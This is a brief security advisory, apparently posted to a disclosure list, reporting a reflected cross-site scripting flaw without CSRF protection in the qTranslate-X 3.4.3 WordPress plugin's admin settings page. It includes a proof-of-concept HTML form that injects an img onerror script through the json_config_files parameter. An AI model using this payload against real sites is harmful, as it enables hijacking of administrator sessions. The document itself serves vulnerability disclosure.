Hello,

Plugin: qTranslate-X 3.4.3 https://wordpress.org/plugins/qtranslate-x/

1. Reflected Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/options-general.php?page=qtranslate-x

Vulnerable parameters: json_config_files, json_custom_i18n_config

Example PHP callstack:

qtranxf_settings_page   [/qtranslate-x/admin/qtx_admin.php:527]

qtranxf_conf   [/qtranslate-x/admin/qtx_configuration.php:507]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=qtranslate-x" />

<input type="text" name="json_config_files" value='</textarea><img src=x onerror=alert(1) />' />

<input type="submit" />

</form>

--